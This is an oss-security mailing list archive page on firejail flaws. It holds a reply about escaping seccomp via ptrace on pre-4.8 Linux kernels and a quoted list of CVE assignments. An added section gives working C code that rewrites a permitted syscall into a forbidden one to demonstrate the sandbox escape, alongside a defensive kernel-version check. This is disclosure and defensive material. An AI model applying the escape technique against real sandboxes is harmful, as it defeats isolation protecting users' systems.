oss-sec mailing list archives
Re: Re: Firejail local root exploit
From: Lizzie Dixon <_ () lizzie io>
Date: Fri, 6 Jan 2017 22:51:10 +0100
Hello oss-security, I was inspired by this thread so I took a look as well. I noticed that firejail allows ptrace with --allow-debuggers, which allows a sandboxed program to escape the seccomp profile by rewriting permitted system calls into unpermitted ones pre-Linux-4.8. This is documented in the seccomp manpage: http://man7.org/linux/man-pages/man2/seccomp.2.html
Before kernel 4.8, the seccomp check will not be run again after the tracer is notified. (This means that, on older kernels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)
(I wrote a little program demonstrating this behavior last year at https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.51 ). I emailed the author and they committed a fix (within 45 minutes!): https://github.com/netblue30/firejail/commit/6b8dba29d73257311564ee7f27b9b14758cc693e#diff-18143ef0a33f3f378f310a976725f141R80

Should this have a CVE id as well?

Best, Lizzie.

On 01/06, cve-assign () mitre org wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> 1. --tmpfs
>
> Use CVE-2016-10117.
>
> 2. Nuke /etc/resolv.conf
>
> Use CVE-2016-10118.
>
> /tmp was mounted tmpfs 0777 prior to:
> commit aa28ac9e09557b833f194f594e2940919d940d1f
>
> Use CVE-2016-10119.
>
> /dev, /dev/shm, /var/tmp, /var/lock were mounted 0777 prior to:
> commit cd0ecfc7a7b30abde20db6dea505cd8c58e7c046
>
> Use CVE-2016-10120.
>
> There are other weak perms fixed around here eg /dev/shm/firejail was 0777 prior to:
> commit 1cab02f5ae3c90c01fae4d1c16381820b757a3a6
>
> Use CVE-2016-10121.
>
> 4. Environment not cleaned before root exec()
>
> Use CVE-2016-10122.
>
> don't allow --chroot as user without seccomp support
>
> Use CVE-2016-10123.
>
> - --
> CVE Assignment Team
> M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
> [ A PGP key is available for encrypted communications at
> http://cve.mitre.org/cve/request_id.html ]
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
>
> iQIcBAEBCAAGBQJYb1OiAAoJEHb/MwWLVhi2N9kP/0AHycN7Au+PTq/bHoxXVi4l
> 74YrEI8PcE1UHIkL2m1kOLbZGTWWc8E0uMEJFTfKrVoIPAINN3iYtU9dYukSACxu
> 4gyQK8xWuzpbqBeF/PIBaZsp9THvTy7sfz2dKYDh/n5i0AFRv34/cs8BUIcl9BDE
> 4D/1FgdwLqarh0SJvclJRBmi4zmftqub3xbt1dJItSfc/5u5SxWMHqHbmW5vESIf
> y3LU27S7E2qnSARfHxk1HfdqViDQO/76yYLQqlfGRc23wyj7ydFWQpRC28x0jjOL
> SCiC91a2gG7nGyV1l/uFIF8QAQMACNl3uJT/5Hgp8ugUOVAko81u/o0liNJMthRK
> NGWhENcFRuHqlqqxvOME/DfErfa7gn2cgFi+udl2BMfllCJb2ICH+Ddg9joaFLfu
> 33iPga5J0MB5YSPQYoCSERjz2Q/i65P9kzgeTjGRLOhHsfY4p6yxUr/YmqTJ9E+W
> DXiTCbpxNJXEsopKwHODBD4ausPQ83A8LGPine7eGaJKoW3q8UdphDqOqitCRFEL
> d/XkVjtt44N0wgjB/ABDezrRAYbRPSudcCDPYh7WVl6V/6D0YRuaqYJ/Q8LlT+Nl
> /17KzyEunx/+0lBjvdtyGz2UQN8F7+9XKl/S0ZRBJS9i+Hrb4ShctP53h2aNbTQT
> nC4OrYY4JBuW90DY4Ef2
> =DJ5s
> -----END PGP SIGNATURE-----
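The escape Lizzie describes above, as an added example that is not code from the thread, from firejail, or from the kernel: a tracer and a seccomp-confined tracee. The tracee's filter permits getpid but hands it to the tracer first (SECCOMP_RET_TRACE) and forbids getppid (SECCOMP_RET_ERRNO). At the PTRACE_EVENT_SECCOMP stop the tracer swaps the already-approved syscall number for the forbidden one; before Linux 4.8 the kernel then executes getppid without consulting the filter again, on 4.8 and later the rewritten call is re-checked and refused. It also includes kernel_rechecks_seccomp(), an illustration (not the linked firejail commit) of the fail-closed guard a sandbox can apply before honouring an option that enables ptrace. Assumptions: x86_64 Linux (the tracer edits orig_rax), ptrace of one's own child allowed (Yama ptrace_scope 2 or below) and unprivileged seccomp filters; run_demo() reports DEMO_UNAVAILABLE rather than guessing when those do not hold.

```c
/* Added example; not code from the thread, from firejail, or from the kernel.
 * Tracer + tracee showing the SECCOMP_RET_TRACE syscall rewrite, plus the
 * kernel-version guard a sandbox can apply. Assumes x86_64 Linux, ptrace of a
 * child permitted (Yama ptrace_scope <= 2) and unprivileged seccomp. */
#define _GNU_SOURCE
#include <errno.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

enum demo_result { DEMO_UNAVAILABLE = 0, DEMO_ESCAPED = 1, DEMO_BLOCKED = 2 };

/* Guard a sandbox can apply before permitting ptrace inside it: only kernels
 * >= 4.8 re-run the filter after the tracer returns. Unparseable -> closed. */
int kernel_rechecks_seccomp(const char *release)
{
    int major = 0, minor = 0;
    if (!release || sscanf(release, "%d.%d", &major, &minor) != 2)
        return 0;
    return major > 4 || (major == 4 && minor >= 8);
}

/* Tracee: filter permits getpid (via RET_TRACE) and forbids getppid, then
 * makes the *permitted* call and reports via exit code what actually ran. */
static void tracee(pid_t parent)
{
    struct sock_filter filt[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_getpid, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRACE),   /* permitted, tracer notified */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_getppid, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = { (unsigned short)(sizeof filt / sizeof filt[0]), filt };

    if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0 || raise(SIGSTOP) != 0)
        _exit(4);                                 /* ptrace not usable here */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0 ||
        prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) < 0)
        _exit(4);
    long r = syscall(SYS_getpid);                 /* tracer rewrites this to getppid */
    if (r == parent) _exit(1);                    /* getppid ran: filter bypassed (pre-4.8) */
    if (r == -1 && errno == EPERM) _exit(2);      /* re-checked and refused (4.8+) */
    _exit(3);                                     /* untouched: no seccomp stop delivered */
}

/* Tracer: at the PTRACE_EVENT_SECCOMP stop, swap the syscall number the
 * filter already approved for one it would have refused. */
int run_demo(void)
{
    pid_t me = getpid(), pid = fork();
    int st;
    if (pid < 0) return DEMO_UNAVAILABLE;
    if (pid == 0) tracee(me);                     /* never returns */
    if (waitpid(pid, &st, 0) < 0 || !WIFSTOPPED(st)) return DEMO_UNAVAILABLE;
    ptrace(PTRACE_SETOPTIONS, pid, 0,
           (void *)(long)(PTRACE_O_TRACESECCOMP | PTRACE_O_EXITKILL));
    for (;;) {
        if (ptrace(PTRACE_CONT, pid, 0, 0) < 0 || waitpid(pid, &st, 0) < 0)
            return DEMO_UNAVAILABLE;
        if (WIFEXITED(st))
            return WEXITSTATUS(st) == 1 ? DEMO_ESCAPED
                 : WEXITSTATUS(st) == 2 ? DEMO_BLOCKED : DEMO_UNAVAILABLE;
        if (!WIFSTOPPED(st)) return DEMO_UNAVAILABLE;
#if defined(__x86_64__)
        if ((st >> 8) == (SIGTRAP | (PTRACE_EVENT_SECCOMP << 8))) {
            struct user_regs_struct regs;
            if (ptrace(PTRACE_GETREGS, pid, 0, &regs) == 0 && regs.orig_rax == SYS_getpid) {
                regs.orig_rax = SYS_getppid;      /* the filter never saw this number */
                ptrace(PTRACE_SETREGS, pid, 0, &regs);
            }
        }
#endif
    }
}

int main(void)
{
    struct utsname u;
    uname(&u);
    printf("kernel %s: %s expected to re-check after a tracer stop\n", u.release,
           kernel_rechecks_seccomp(u.release) ? "is" : "is NOT");
    int r = run_demo();
    puts(r == DEMO_ESCAPED ? "rewritten syscall executed: sandbox escaped"
       : r == DEMO_BLOCKED ? "rewritten syscall re-checked and refused"
       : "demo could not run (ptrace/seccomp unavailable)");
    return r == DEMO_BLOCKED ? 0 : 1;
}
```

On a 4.8 or later kernel the program reports that the rewritten call was refused; on an older kernel the tracee receives its parent's pid from a syscall the filter forbids, which is the escape. The guard is deliberately fail-closed: anything that does not parse as major.minor is treated as a kernel that does not re-check, since letting a debugger into a seccomp sandbox on such a kernel turns every traced syscall into an arbitrary one.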
Current thread:
- Firejail local root exploit Sebastian Krahmer (Jan 04)
- Re: Firejail local root exploit cve-assign (Jan 04)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 05)
- Re: Firejail local root exploit cve-assign (Jan 06)
- Re: Re: Firejail local root exploit sivmu (Jan 06)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 07)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 08)
- Re: Re: Firejail local root exploit Simon McVittie (Jan 08)
- Re: Re: Firejail local root exploit Brad Spengler (Jan 08)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 08)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 05)
- Re: Firejail local root exploit cve-assign (Jan 04)
- Re: Re: Firejail local root exploit Lizzie Dixon (Jan 06)
- Re: Firejail local root exploit cve-assign (Jan 07)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 07)
- Re: Firejail local root exploit cve-assign (Jan 07)
- Re: Firejail local root exploit cve-assign (Jan 06)
- Re: Re: Firejail local root exploit Thomas Deutschmann (Jan 31)
- <Possible follow-ups>
- Re: Re: Firejail local root exploit Thomas Deutschmann (Feb 09)